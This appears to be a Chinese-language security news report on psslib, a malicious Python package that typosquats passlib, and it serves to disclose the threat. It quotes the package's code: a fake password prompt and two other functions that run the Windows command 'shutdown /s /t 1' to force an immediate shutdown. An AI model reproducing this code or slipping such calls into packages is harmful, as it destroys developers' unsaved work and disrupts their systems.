Socket威胁研究团队发现一个名为psslib的恶意Python包，该软件包伪装成提供密码安全功能，实则会突然关闭Windows系统。这个由化名umaraq的威胁行为者开发的软件包，是对知名密码哈希工具库passlib的拼写错误仿冒（typosquatting）。passlib作为数百万开发者信赖的工具库，每月下载量超过890万次。

恶意代码工作机制

该恶意包通过名为spc()的函数伪装密码保护功能，使用easygui.enterbox()获取用户输入。当输入值与预设密码不匹配时，会立即执行Windows关机命令（shutdown /s /t 1），使系统在一秒内关闭：

def spc(password):# 恶意代码：输入错误时强制系统关机if easygui.enterbox('enter password:-') != password:os.system("shutdown /s /t 1") # 1秒后关机

此外，psslib还包含两个无需任何验证即可关闭系统的函数：

def src():# 无需用户输入直接强制关机os.system("shutdown /s /t 1")def error(message):# 写入错误信息后强制关机sys.stderr.write(message)os.system("shutdown /s /t 1")

攻击影响与针对性

Socket指出，这种恶意软件专门针对基于Windows的开发环境。当开发者在具有提升权限的环境中运行时，即使有限使用该库也会立即危及系统。攻击将导致：

• 未保存工作和数据丢失
• 打开的文件和数据库损坏
• 运行中的服务中断

虽然由于操作系统命令差异，该恶意负载在Linux或macOS上会无害失效，但其针对Windows的特性显示出明确的攻击意图。Socket的AI扫描器已将该包标记为恶意软件，因其具有破坏性系统关机行为。